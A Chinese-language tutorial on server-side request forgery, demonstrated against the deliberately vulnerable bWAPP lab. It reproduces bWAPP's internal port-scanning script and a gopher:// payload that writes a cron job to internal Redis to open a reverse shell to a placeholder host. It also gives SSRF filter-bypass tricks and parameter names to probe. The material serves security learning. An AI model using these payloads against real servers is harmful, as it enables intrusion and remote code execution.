SSRF

SSRF利用可以发起网络请求的服务,当做跳板来攻击其他服务。ssrf是穿越防火墙的通行证。(盗图)

http://docs.ioin.in/writeup/fuzz.wuyun.org/_src_build_your_ssrf_exp_autowork_pdf/index.pdf

漏洞利用

利用bWAPP靶机进行演示

首先可以看到language参数可以发起网络请求

内网主机端口嗅探

这里利用的是靶机自带脚本

<?php

/*

bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities.
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!
It is for educational purposes only.

Enjoy!

Malik Mesellem
Twitter: @MME_IT

漏 2013 MME BVBA. All rights reserved.

*/

echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";

if(isset($_REQUEST["ip"]))
{

//list of port numbers to scan
$ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);

$results = array();

foreach($ports as $port)
{

if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
{

$results[$port] = true;
fclose($pf);

}

else
{

$results[$port] = false;

}

}
 
foreach($results as $port=>$val)
{

$prot = getservbyport($port,"tcp");
echo "Port $port ($prot): ";

if($val)
{

echo "<span style=\"color:green\">OK</span><br/>";

}

else
{

echo "<span style=\"color:red\">Inaccessible</span><br/>";

}

}

}
?>

打内网redis

http://192.168.233.130/bWAPP/rlfi.php?language=gopher&i=127.0.0.1&p=6389&query=_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0  
a%0a%0a*/1%20*%20*%20*%20*%20bash%20-i%20>&%20/dev/tcp/xxx.xxx.xxx.xxx/xxx%200>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d  
%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3
%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'

不过本地没有利用成功

读取文件

利用文件协议读取文件

枚举(users/dirs/files)

利用burp进行目录枚举,可以用于cms识别,也可以url+paylaod对内网进行攻击。

Discuz ssrf exp

https://phpinfo.me/2017/02/23/1438.html

更详细的利用

http://blog.safebuff.com/2016/07/03/SSRF-Tips/

漏洞挖掘

web功能

通过URL地址分享网页内容
通过url地址加载或下载图片
图片文章收藏功能
在线翻译:通过url地址翻译对应文本内容
未公开的api实现以及其他调用URL的功能

关键字

share
wap
url
link
src
source
target
u
3g
display
sourceURl    
imageURL    
domain

过滤

http://www.baidu.com@10.10.10.10与http://10.10.10.10 请求是相同的

将IP地址转换成二进制

参考连接:

https://www.secpulse.com/archives/4747.html

https://uknowsec.cn/posts/notes/SSRF%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E4%B8%8E%E5%AD%A6%E4%B9%A0.html

https://www.freebuf.com/articles/web/20407.html